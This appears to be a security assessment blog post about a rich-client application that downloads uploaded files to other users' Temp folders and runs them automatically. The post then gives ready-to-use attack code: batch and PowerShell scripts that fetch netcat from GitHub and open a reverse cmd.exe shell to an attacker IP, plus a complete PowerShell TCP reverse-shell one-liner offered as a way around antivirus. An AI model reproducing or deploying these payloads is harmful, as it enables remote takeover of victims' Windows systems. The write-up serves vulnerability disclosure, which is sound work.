A Rich Client Shell

Black_Koopa_Shell

Outlined below is a technique which was found during one of my security assessments, using which it was possible to get a reverse shell of a windows system via rich client.

Rich Client:

A rich client is a networked computer that has some resources installed locally but also depends on other resources distributed over the network. The rich client’s configuration is somewhere between that of a thin client, which relies largely upon network-distributed resources, and a fat client which has most resources installed locally.

– Internet

It was a five day assessment and to be frank I wouldn’t say the testing was going really well. The application was huge, comprising various environments, functionalities and modules to be tested; and the developers of the application had made sure that most of the things were secure except for this one module about which you will find out by the end of the blog.

So, the only thing I could get my hands on were some sensitive stuff like username/password, Server details, etc. stored in the log files of the system. The client-server traffic was encrypted and most of the interception methods failed.

During this process I came across multiple upload functionalities that were accessible to all users 😈

Note: The application had multiple user groups and I was given few roles for testing. The users within the same group had access to each other’s data.

As it was a confidential application , we were supposed to verify the Antivirus checks at the server side #OrganizationGoals. Hence, I tried uploading the famous ‘eicar.exe‘ anti-virus test file, to check the behavior of the application.

Upload Successful :mrgreen:

I tried double clicking on the uploaded ‘eicar.exe’ file and was interrupted by this popup:

alert

Notice the Path? C:\Users\XYZ\AppData\Local\Temp\eicar_Internal.exe

Firstly, what is ‘eicar_Internal.exe’ ? and what’s it doing in the ‘Temp’ folder?

Secondly, why exactly was the file caught by the antivirus?

After a bit of playing around with the application, I noticed that whenever a user tried to access any of the uploaded files, the application downloads a copy of that particular file onto the user’s system with the following name ‘_Internal‘ and EXECUTES the same without user interaction.

Simpler words eicar.exe is renamed to eicar_Internal.exe and executed.

1

I Immediately switched to another VM and logged into the application as a different user. The results were the same.

eicar_Internal.exe‘ is downloaded and executed from the TEMP folder.

WHAAAAAAAAAT..!

I guess everyone knows by now what the ultimate goal is?

I wrote some scripts, which would use powershell to download our best friend netcat onto the victim’s system and throw a shell back to the attacker.

Using Batch:

@echo off
powershell -Command “(New-Object Net.WebClient).DownloadFile(‘https://github.com/diegocr/netcat/raw/master/nc.exe‘, ‘nc_Internal.exe’)”
nc_Internal.exe <Attacker’s IP> 8888 -e cmd.exe

Using Powershell:

Set-ExecutionPolicy Unrestricted
$webclient = New-Object System.Net.WebClient
$url = “https://github.com/diegocr/netcat/raw/master/nc.exe
$file = “/<Download_Path>/nc_Internal.exe”
$webclient.DownloadFile($url,$file)
$end = ‘$file AttackersIP 8888 -e cmd.exe’
iex “& $end”

For people who have issues with antivirus while downloading netcat onto the victim’s system…Do not worry!

My friend Aamer, has written a ps code; which helps us get a shell without the need of netcat:

$client = New-Object System.Net.Sockets.TCPClient(‘AttackersIP’,443);$stream = $client.GetStream();[byte[]]$bytes = 0..255|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + “PS ” + (pwd).Path + “> “;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length)}

Finally, when the victim tries to access the the uploaded file…Game Over!

Just make sure you’re listening!

shell

 Hope you enjoyed the blog!

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s